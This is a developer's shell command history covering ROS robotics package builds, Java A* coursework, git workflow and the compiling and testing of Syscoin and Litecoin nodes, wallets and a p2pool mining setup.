auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm clean +cm --pkg auv_msg +cm --pkg auv_msgs +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +cm --pkg auv_mapp +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +exit +roscore +rosparam get /map/origin/x +rosparam get /map/origin/y +roscore +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +l +java TweetToFeature +roscore +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +git commit -m 'Done with Map Builder' +git add . +git commit -m 'Done with Map Builder' +git fetch origin +git merge origin/newArchitecture +git push origin +git status +cm --pkg auv_map +rosrun auv_msgs map_builder +rosrun auv_map map_builder +exit +wificonn +k +wificonn +catkin_create_pkg learning_tf tf roscpp turtlesim +cm --pkg learning_tf +rosrun tf tf_echo /world /turtle1 +roscd learning_tf +l +vim turtle_tf_broadcaster.cpp +rosed learning_tf CMakeLists.txt +cm --pkg learning_tf +vim turtle_tf_broadcaster.cpp +cm --pkg learning_tf +vim turtle_tf_broadcaster.cpp +cm --pkg learning_tf +vim turtle_tf_broadcaster.cpp +cm --pkg learning_tf +l +mkdir launch +vim start_demo.launch +roslaunch learning_tf start_demo.launch +vim start_demo.launch +roslaunch learning_tf start_demo.launch +vim start_demo.launch +roslaunch learning_tf start_demo.launch +rosmsg show geometry_msgs/Twist +roslaunch learning_tf start_demo.launch +l +l +vim turtle_tf_listener.cpp +rosed learning_tf CMakeLists.txt +cm --pkg learning_tf +vim turtle_tf_listener.cpp +cm --pkg learning_tf +rosed learning_tf CMakeLists.txt +vim turtle_tf_listener.cpp +cm --pkg learning_tf +rosmsg list +rostopic list +vim turtle_tf_listener.cpp +cm --pkg learning_tf +roscore +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +k +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +git status +git status +git add . +git status +cm --pkg auv_map +git status +cm --pkg auv_map +git status +git add . +git status +git commit 'DoNe WiTh MaPs! Phew.' +git commit -m 'DoNe WiTh MaPs! Phew.' +l +git fetch origin +git merge origin/newArchitecture +git push origin newArchitecture +l +ls +l +javac AStar. +javac AStar.java +rosmsg show auv_msgs/Pose +k +wificonn +k +wificonn +k +wificonn +k +wificonn +k +wificonn +k[A +wificonn +ssh -X matsya +exit +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +cm --pkg learning_tf +rosed auv_vision temp_vision.launch +rosed learning_tf turtle_tf_broadcaster.cpp +rosed learning_tf turtle_tf_listener.cpp +vim src/frame_tf_broadcaster.cpp +cm --pkg learnin_tf +cm --pkg learning_tf +rosed learning_tf CMakeLists.txt +cm --pkg learning_tf +vim src/frame_tf_broadcaster.cpp +rosed learning_tf start_demo.launch +rosed learning_tf turtle_tf_listener.cpp +vim src/frame_tf_broadcaster.cpp +rosed learning_tf turtle_tf_listener.cpp +rosed learning_tf turtle_tf_broadcaster.cpp +rosed learning_tf turtle_tf_listener.cpp +cm --pkg learning_tf +roscd robosub +roscd auv_msgs/ +git checkout scan_state +l +l +l +roscd auv_stack/ +l +roscd auv_planning/ +l +search "tf" +l +roscd auv_states/ +l +l +l +search "tf" +l +l +search "Tf" +search "tf" +search "class" +git status +git log +git fetch origin +git merge origin/scan_state +rosed auv_states tf.cpp +rosed auv_states tf.h +search "tf" +l +rosed auv_states tf.cpp +roscd tf_conversions/ +roscd learning_tf/ +l +roslaunch start_demo.launch +javac AStar.java +git fetch origin +git status +git log +git status +git add . +l +git status +l + +git status +git add lab1/TweetsCorpus/TweetToFeature.java +git add lab1/TweetsCorpus/stopwords.txt +vi .gitignore +git status +git add .gitignore +l +git push origin master +git commit -m 'A star basic structure ready' +git push origin master +rosrun tf tf_echo /world +rosrun tf tf_echo /world /turtle1 +rosrun tf tf_echo /world /turtle2 +rosrun tf tf_echo /turtle1 /turtle2 +rosmsg show turtlesim/Pose +javac Problem.java +javac State.java +javac MovesList.java +javac Problem.java +oscore +roscore +xdot +roslaunch learning_tf start_demo.launch +rosmsg show geometry_msgs/Pose +rosmsg show turtlesim/Pose +rosmsg show tf/tfMessage +rosmsg show geometry_msgs/Pose +rosmsg show turtlesim/Pose +view_frames +l +rm frames.* +view_frames +vim ~/.bashrc + +vim /home/bhasky/.bashrc +sudo chmod 777 /dev/ttyUSB0 +rosrun rosserial_python serial_node.py /dev/ttyUSB0 +sudo apt-get install ros-hydro-rosserial-arduino +sudo apt-get install ros-hydro-rosserial +git status +mkdir ros_demo/ +mkdir arduino +git clones-drivers/rosserial.git +cm --pkg arduino +l +cm --pkg rosserial/ +cm --pkg rosserial +cm install +cm install --pkg rosserial +l +l +touch CATKIN_IGNORE +cm' +cm +touch CATKIN_IGNORE +cm +cm install +source install/setup.bash +source install/setup.bash > ~/.bashrc +source install/setup.bash >> ~/.bashrc +echo "source install/setup.bash" >> ~/.bashrc +reload +sudo apt-get install arduino-core +sudo apt-get install arduino +sudo apt-get install arduino --fix-missing +sudo apt-get install arduino-mk +sudo apt-get install arduino +vim /home/bhasky/.bashrc +l +./arduino +rm -rf ros_lib/ +rosrun rosserial_arduino make_libraries.py +rosrun rosserial_arduino make_libraries.py ./ +./arduino +reload +sudo chmod 777 /dev/ttyUSB0 + +rostopic echo /my_topic / +rostopic echo /my_topic +rostopic echo /chatter / +rostopic echo /chatter +l +git fetch origin +git merge origin/scan_state +rosed auv_states tf.cpp +rosed auv_states tf.cpp + +rosed auv_states tf.cpp +git merge origin/scan_state +git stash +git merge origin/scan_state +git fetch origin +git merge origin/scan_state +ls +ls +git checkout origin/scan_state +l +l +l +git checkout scan_state +l +l +l +l +l +vim tf.h +search advertise +search "advertise" +search "subscribe" +rosmsg show auv_msgs/Belief +roslaunch learning_tf start_demo.launch +vim /home/bhasky/.vimrc +cm --pkg auv_localization +roscd auv_states +l +l +l +cm --pkg auv_localization +cm --pkg auv_map +rosrun auv_map map_builder +git add . +git status +git commit -m 'auv_localization vehicle tf created, cm error corrected' +git whatchanged +git fetch origin +git merge origin/scan_state +git push origin scan_state +git checkout newArchitecture +l +l +l +l +l +cm --pkg auv_map +cm clean +cm --pkg auv_msgs +cm --pkg auv_map +cm clean +cm --pkg auv_msgs +cm +cm --pkg auv_map +cm --pkg learning_tf +cm --pkg auv_map +git status +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun tf tf_echo /world /map +rosparam get /map/bin_center/x +rosparam get /map/bin_center/y +rosparam get /map/bin_center/x +rosparam get /map/bin_center/y +rosparam get /map/pizza_center/x +rosparam get /map/pizza_center/y +rosparam get /map/red_buoy_center/x +rosparam get /map/red_buoy_center/y +rosparam get /map/red_buoy_center/z +rosparam get /map/red_buoy_center/x +rosparam get /map/red_buoy_center/y +rosparam get /map/red_buoy_center/x +rosparam get /map/red_buoy_center/y +rosparam get /map/red_buoy_center/x +rosparam get /map/red_buoy_center/y +rosparam get /map/torpedo_center/x +rosparam get /map/torpedo_center/y +rosparam get /map/red_buoy_center/y +rosparam get /map/torpedo_center/x +rosparam get /map/red_buoy_center/x +rosparam get /map/red_buoy_center/y +rosparam get /map/red_buoy_center/ +rosparam get /map/torpedo_center/x +rosparam get /map/red_buoy_center/y +rosparam get /map/red_buoy_center/x +rosparam get /map/red_buoy_center/y +rosparam get /map/red_buoy_center/x +rosparam get /map/torpedo_center/x +rosparam get /map/torpedo_center/y +cm --pkg auv_map +git add . +git status +git add -u +git status +git commit -m 'boost + qt Pain' +git fetch origin +git merge origin/newArchitecture +git push origin newArchitecture +cm --pkg auv_map +roscd auv_map/p +roscd auv_map +search "slots" +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +git add -u +git commit -m 'Map updated with tf' +git push origin newArchitecture +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +rosmsg show auv_msgs/Map +cm --pkg auv_map +rosmsg show auv_msgs/Map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +git add -u +git commit -m 'Done with map with tf, and it now publishes world co-ordinates' +git fetch origin +git push origin newArchitecture +rqt_plot +rqt_graph +roscore +exit +l +javac Problem.java +javac AStar.java +l +del *.clas +del *.class +rm *.class +javac AStar.java +vim State.java +vim Problem.java +javac AStar.java +roscore +rosrun auv_map map_builder +javac AStar.java +javac Problem.java +javac AStar.java +roscd auv_states +l +status +git status +git log +git status +l +ls -l +ls +ls | more +ls | more > ~/auv_ws/src/robosub/doc/packages.txt +gedit doc/packages.txt +ls -d +ls d +ls -ld +ls -l + +man ls +l +gedit ~/.bashrc +l +ls +la +lC +lCc +lc +l +vim checksum.cpp +vim CMakeLists.txt +vim Packages +vim TROUBLE_SHOOTING +roscd ardu_imu +l +l +l +l +l +git fetch origin +git status +rm doc/packages.txt +git commit -m 'Doxumentation change testing' +git add -u +git commit -m 'Doxumentation change testing' +git merge origin/newArchitecture +git status +git push origin newArchitecture +l +javac *.java +java AStar +rm *.clas +rm *.class +javac 8PuzzleStates.java +mv 8PuzzleStates.java 8PuzzleState.java +javac 8PuzzleState.java +mv 8PuzzleState.java EightPuzzleState.java +javac EightPuzzleState.java +javac EightPuzzleMovesList.java +javac EightPuzzle.java +rm *.class +javac EightPuzzle.java +rm *.class +javac EightPuzzle.java +javac EightPuzzleMovesList.java +javac EightPuzzle.java +javac AStarTester.java +java AStarTester +javac AStarTester.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +git status +git add -u +git status +git add -u +git status +git add . +git status +git commit -m 'A star 8 puzzle' +git fetch origin +git status +git push origin master +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +rm *.class +javac *.java +rm *.class +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +javac *.java +java AStarTester +rm *.class +roscore +git status +git add . +git status +git commit -m "A star updated" +git fetch origin +git merge origin/master +l +qmake -project +qmake +make +./qt\ test +qmake +qmake -project +qmake +make +./qt\ test +roscd auv_map +l +rosrun auv_map map_builder +search "auv_vision" +k +l +search "camera" +rosed auv_vision uvc_camera.launch +screen +sudo apt-get install screen +search advertise +search publish +search subscribe +search advertise +search subscribe +rosrun auv_map map_builder +cm --pkg auv_debug +rosrun auv_debug electronics_interface +cm clear +git status +git add -u +git commit -m 'auv_scheduler added' +git add auv_scheduler/ +git commit -m 'auv_scheduler added' +git push origin newArchitecture +git pull origin +git fetch origin +exit +sudo apt-get update +python +exit +make +l +make +chmod 777 ~/test/tex_to_pdf.py +rm architecture.pdf +~/test/tex_to_pdf.py architecture.tex +pip install requests +sudo apt-get install python-pip +sudo pip install requests +~/test/tex_to_pdf.py architecture.tex +vim /home/bhasky/test/tex_to_pdf.py +cat /home/bhasky/test/tex_to_pdf.py +vim /home/bhasky/test/tex_to_pdf.py +roscd auv_imu_driver +search advertise +sudo apt-get install kyle +sudo apt-get install kile +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +ssh -X matsya +git config --global user.name "sum1234567" +git config --global user.email "zsan43901@gmail.com" +ssh-keygen -t rsa -C "zsan43901@gmail.com" +git config --global user.name sum1234567 +git config --global user.name sum1234567 +git config --global user.email zsan43901@gmail.com +ssh-keygen -t rsa -C zsan43901@gmail.com +ssh-keygen -t rsa -C zsan43901@gmail.com +ls +cat id_rsa.pub +syscoind addnode stella.hopto.org add +syscoind atop +syscoind stop +syscoind +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode stella.hopto.org add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +syscoind addnode add +ifconfig +ls +cat debug.log +nano syscoin.conf +cat debug.log +clear +syscoind addnode stella.hopto.org +syscoind addnode stella.hopto.org add +syscoind addnode add +syscoind addnode add +syscoind getpeerinfo +syscoind getblockvalue 1333 +syscoind getblock 1333 +syscoind getblockhash 1333 +syscoind getblockhash 1773 +syscoind getblockhash 1669 +syscoind getblockhash 2021 +syscoind getblockhash 2375 +nano debug.log +syscoind getblockhash 1759 +syscoind getblockhash 2375 +syscoind help +syscoind getblock 1819af6faaa15ca12cf51ab67e75507f8d5c41fc8215d458afe6ad62bff90276 +syscoind getblockhash 1760 +ls +git pull origin master +git checkout checkpoints-new +git pull origin +git checkout checkpoints-new +ls +nano net.cpp +clear +make -f makefile.osx +make -f makefile.unix +syscoind getblockhash 2380 +clear +git status +git reset --hard HEAD +git pull origin checkpoints-new +git branch +clear +make -f makefile.osx +make -f makefile.unix +syscoind stop +sudo cp syscoind /usr/bin +ls +syscoind +ls +nano debug.log +cat debug.log +syscoind +ls +rm -r aliases/ offers/ blocks/ chainstate/ certificates/ offers/ *.log *.dat +ls +rm database/ +ls +rm -r database/ +ls +clear +syscoind +clear +ls +clear +syscoind stop +ls +rm -r aliases/ blocks/ certificates/ chainstate/ *.log offers/ wallet.dat +ls +mv bootstrap.dat.old bootstrap.dat +ls +clear +ls +syscoind +nano debug.log +clear +ls +rm -r aliases/ blocks/ certificates/ chainstate/ data *.log peers.dat wallet.dat +ls +rm -r database/ offers/ +syscoind stop +rm -r database/ offers/ +rm -r aliases/ blocks/ certificates/ chainstate/ data *.log peers.dat wallet.dat +ls +srm syscoin.pid +ls +rm syscoin.pid +ls +rm syscoind.pid +ls +mv bootstrap.dat.old bootstrap.dat +ls +syscoind +ls +nano debug.log +syscoind stop +rm -r aliases/ blocks/ certificates/ chainstate/ data *.log peers.dat wallet.dat +ls +rm -r offers/ +ls +mv bootstrap.dat.old bootstrap.dat +ls +syscoind +nano checkpoints.cpp +make -f makefile.unix +syscoind stop +make -f makefile.unix +cp syscoind /usr/bin +clear +syscoind stop +clear +git checkout master +git pull origin master +clear +make -f makefile.unix +sudo cp syscoind /udt/bin +sudo cp syscoind /usr/bin +syscoind +syscoind stop +ls +ls +ls +ld +ls +ls +ls +ls +cp bootstrap.dat ~/.syscoin/ +ls +ls +syscoind stop +syscoind +syscoind help +syscoind stop +ls +rm -r aliases/ blocks/ certificates/ chainstate/ db.log debug.log offers/ wallet.dat +ls +mv bootstrap.dat.old bootstrap.dat +ls +clear +ls +syscoind +ls +nano debug.log +ls +ll +nano checkpoints. +nano checkpoints.cpp +ls +make -f makefile.unix +syscoind stop +cp syscoind /usr/bin +clear +ls +nano main.cpp +make -f makefile.unix +cp syscoind /usr/bin +ls +nano main.cpp +make -f makefile.unix +nano main.cpp +make -f makefile.unix +cp syscoind /usr/bin +;s +ls +cat debug.log +nano debug.log +n +clear +ls +rm -r alias blocks/ certificates/ chainstate/ *.log offers/ *.dat +ls +rm -r aliases/ +ls +syscoind stop +mv bootstrap.dat.old bootstrap.dat +ls +;s +ls +syscoind +syscoind stop +nano ~/syscoin/src/main.cpp +make -f makefile.unix +syscoind stop +sudo cp syscoind /usr/bin +git checkout -b bootstrap-load +git add . +git commit -a -m 'force bootstrap load' +git config --global user.email "coderboo@syscoin.org" +git config --global user.name "Coder Boo" +git commit -a -m 'force bootstrap load' +git status +git p[ush origin bootstrap-load +git push origin bootstrap-load +ls +git checkout master +git pull origin master +ls +clear +ls +ls +clear +nano main.cpp +make -f makefile.unix +syscoind stop +cp syscoind /usr/bin +ls +clear +rm -r aliases/ blocks/ chainstate/ certificates/ offers/ *.dat *.log +ls +mv bootstrap.dat.old bootstrap.dat +ls +syscoind +syscoind stop +clear +rm wallet.dat +syscoind +syscoin +syscoind stop +nano net.cpp +make -f makefile.unix clena +make -f makefile.unix clean +make -f makefile.unix -j2 +cp syscoind /usr/bin +ls +rm wallet.dat +ls +clear +ls +clear +cp syscoind /usr/bin +ls +clear +syscoind +clear +nano syscoin.conf +ls +rm bootstrap.dat.old +ls +syscoind stop +killall syscoind +syscoind +syscoind stop +clear +ls +syscoind stop +rm wallet.dat +clear +syscoind +ls +ls +git clone +ls +ls +make -f makefile.unix -j4 +;s +ls +cp litecoind /usr/bin +litecoind +ls +nano litecoin.conf +litecoind +clear +apt-get install python-zope.interface python-twisted python-twisted-web +ls +ls +ls +git clone +ls +mv * .. +ls +rm -r P2PoolExtendedFrontEnd/ +ls +;s +ls +python setup.py install +ls +clear +litecoind stop +ls +nano litecoin.conf +litecoind +clear +ls +ls +cat README.md +syscoind +ls +git clonese +ls +make -f makefile.unix -j4 +ls +cp lycancoind /usr/bin +lycancoind +nano lycancoin.conf +lycancoind +sudo killall lycancoind +nano lycancoin.conf +lycancoind +nano lycancoin.conf +lycancoind +clear +rm /usr/bin/lycancoind +ls +rm -r .lycancoin/ +ls +rm -r lycancoin-release/ +ls +rm -r Sia go +ls dev +rm -r dev +ls +clear +ls +pwd +ls +clear +ls +ls +syscoind stop +ls +clear +rm debug.log +syscoind +nano debug.log +ping +ping +echo "ping" > addr +echo "ping" >> addr +cat addr +ls +nano syscoin.conf +clear +ls +clear +git pull origin +git checkout MM +git pull origin MM +ls +make -f makefile.unix -j4 +syscoind stop +cp syscoind /usr/bin +syscoind +ls +git checkout master +git pull origin master +make -f makefile.unix +make -f makefile.unix -j4 +clear +cat litecoin.conf +litecoind stop +nano litecoin.conf +litecoind +nano litecoin.conf +ls +cat syscoin.conf +ls +ls +ls +ld +ls +ll +ls +mv addr .. +ls +clear +ls +cat addr +clear +wgetst:9332 +wget +wget +wget +ls +cat addr +wget +cat index.html +rm index.html +clear +ifconfig +clear +cat addr +curlsmyip.org/ +apt-get install curl +curlsmyip.org/ +curl +syscoind help +syscoind getnewaddres 1 +syscoind getnewaddress 1 +syscoind getnewaddress 2 +syscoind getnewaddress 3 +syscoind listaccounts +syscoind sendmany +syscoind getaccountaddress "" +syscoind SapH8g6S7eFResnQfuMruXn6EAp1Pw2ZtU SiiJQrjJV37MVYUHz6UBW5tVCXZcQFj1XP:10 SbA51srP134SJkeLEjBBPfCNeD61kWfdqo:10 SbJfum42NdgLGDxJUnk9qNetDYyp4uMob3:10 +syscoind sendmany SapH8g6S7eFResnQfuMruXn6EAp1Pw2ZtU SiiJQrjJV37MVYUHz6UBW5tVCXZcQFj1XP:10 SbA51srP134SJkeLEjBBPfCNeD61kWfdqo:10 SbJfum42NdgLGDxJUnk9qNetDYyp4uMob3:10 +syscoind sendmany "SapH8g6S7eFResnQfuMruXn6EAp1Pw2ZtU SiiJQrjJV37MVYUHz6UBW5tVCXZcQFj1XP:10 SbA51srP134SJkeLEjBBPfCNeD61kWfdqo:10 SbJfum42NdgLGDxJUnk9qNetDYyp4uMob3:10" +syscoind sendmany SapH8g6S7eFResnQfuMruXn6EAp1Pw2ZtU "SiiJQrjJV37MVYUHz6UBW5tVCXZcQFj1XP:10" "SbA51srP134SJkeLEjBBPfCNeD61kWfdqo:10" "SbJfum42NdgLGDxJUnk9qNetDYyp4uMob3:10" +syscoind sendmany SapH8g6S7eFResnQfuMruXn6EAp1Pw2ZtU {"SiiJQrjJV37MVYUHz6UBW5tVCXZcQFj1XP":10, "SbA51srP134SJkeLEjBBPfCNeD61kWfdqo":10, "SbJfum42NdgLGDxJUnk9qNetDYyp4uMob3":10} +syscoind sendmany SapH8g6S7eFResnQfuMruXn6EAp1Pw2ZtU {SiiJQrjJV37MVYUHz6UBW5tVCXZcQFj1XP:10, SbA51srP134SJkeLEjBBPfCNeD61kWfdqo:10, SbJfum42NdgLGDxJUnk9qNetDYyp4uMob3:10} +syscoind sendmany SapH8g6S7eFResnQfuMruXn6EAp1Pw2ZtU '{"SiiJQrjJV37MVYUHz6UBW5tVCXZcQFj1XP":10, "SbA51srP134SJkeLEjBBPfCNeD61kWfdqo":10, "SbJfum42NdgLGDxJUnk9qNetDYyp4uMob3":10}' +syscoind getaccountaddress "" +syscoind sendmany '' '{"SiiJQrjJV37MVYUHz6UBW5tVCXZcQFj1XP":10, "SbA51srP134SJkeLEjBBPfCNeD61kWfdqo":10, "SbJfum42NdgLGDxJUnk9qNetDYyp4uMob3":10}' +syscoind listaccounts +syscoind getinfo +syscoind listaccounts +syscoind stop +ls +make -f makefile.unix +git status +syscoind stop +cp syscoin /usr/bin +cp syscoind /usr/bin +nano main.h +syscoind +syscoind listaccounts +syscoind getaccountaddress "" +syscoind listaccounts +cat addr +curl +cat addr +curl +curl +curl +ls +curl +curl +curl +curl +curl +wget +cat index.html +rm index.html +ls +wget +ls +cat index.html +rm index.html +cat addr +wget +wget +clear +ls +rm index.html +ls +syscoind getaccountaddress "" +git pull origin +git status +git reset --hard HEAD +git pull origin master +ls +make -f makefile.unix -j4 +ls +make -f makefile.unix -j4 +ls +syscoind stop +ls +cp syscoind /usr/bin +ls +cp syscoind /usr/bin +ls +ls +cp syscoind /usr/bin +syscoind +git branch -r +git checkout negfee-patch +make -f makefile.unix +make -f makefile.unix -j4 +clear +make -f makefile.unix +syscoind stop +cp syscoind /usr/bin +syscoind +clear +syscoind listaccounts +syscoind getaccountaddress "" +syscoind getaccountaddress "1" +syscoind getaccountaddress "2" +syscoind getaccountaddress "3" +syscoind sendmany "" '{"SdnBdC5rwHJ5gc3TvV5vP92b9B2p7Hicg9":5}' +syscoind getinfo +syscoind listaccounts +syscoind getinfo +syscoind getbalance +syscoind getbalance "" +syscoind getinfo +syscoind +git checkout -b forrest +make -f makefile.unix +syscoind stop +clear +cp syscoind /usr/bin +killall syscoind +cp syscoind /usr/bin +syscoind +clear +git add . +git commit -a -m "replaced balance check in sendmany with pWalletMain->GetBalance(). downside is that the send amount check against a specific account is gone. Upside is that sendmany works as long as there's enough funds in the wallet to cover." +git push origin forrest +syscoind sendmany "" '{"SdnBdC5rwHJ5gc3TvV5vP92b9B2p7Hicg9":}' +syscoind getaccountaddress 3 +syscoind getaccountaddress "" +syscoind listaccounts +syscoind getaccountaddress 3 +syscoind sendmany "1" '{"SXPp9ePqut2HwvJ1rrMcFXhz6WFFvm3pTH":5}' +syscoind listaccounts +syscoind getbalance +syscoind listaccounts +ls +clear +ls +ls +git pull origin +git status +git checkout master +git pull origin master +clear +make -j4 -f makefile.unix +ls +git branch +cp syscoind /usr/vin +cp syscoind /usr/bin +rm usr/vin +syscoind +clear +syscoind +clear +syscoind +pwd +make stop +make start +clear +make getinfo +clear +ls +litecoind -datadir=L1 stop +litecoind -datadir=L1 +ld +ls +litecoind -datadir=L1 stop +litecoind +netstat -lnp +litecoind stop +nano ~/.litecoin/litecoin.conf +litecoind +litecoind --datadir=L1 +exit +screen -r +screen help +screen -help +screen -R +exit +ls +exot +exit +ls +python run_p2pool.py +python run_p2pool.py --net litecoin +clear +python run_p2pool.py --net litecoin +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 litecoinrpc rpcpassword +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 litecoinrpc rpcpassword --mergedser:changethispasswordplease@localhost:8368/ +clear +python run_p2pool.py --net litecoin --give-author 0 --bitcoind-rpc-port 10332 --bitcoind-p2p-port 10333 litecoinrpc rpcpassword --mergedser:changethispasswordplease@localhost:8368/ +litecoind stop +ls +make getinfo +ls +litecoind stop +litecoind -datadir=L1 getinfo +ls +rm blocks/ chainstate/ *.log *.dat +ls +rm -r blocks/ chainstate/ *.log *.dat +ls +nano litecoin.conf +ls +ls +cp L1/ L2 +ls +cp -R L1/ L2 +nano L2/litecoin.conf +nano L1/litecoin.conf +nano L2/litecoin.conf +ls +litecoind -datadir=L1 +litecoind -datadir=L2 +litecoind -datadir=L1 getinfo +litecoind -datadir=L2 getinfo +clear +litecoind -datadir=L2 getinfo 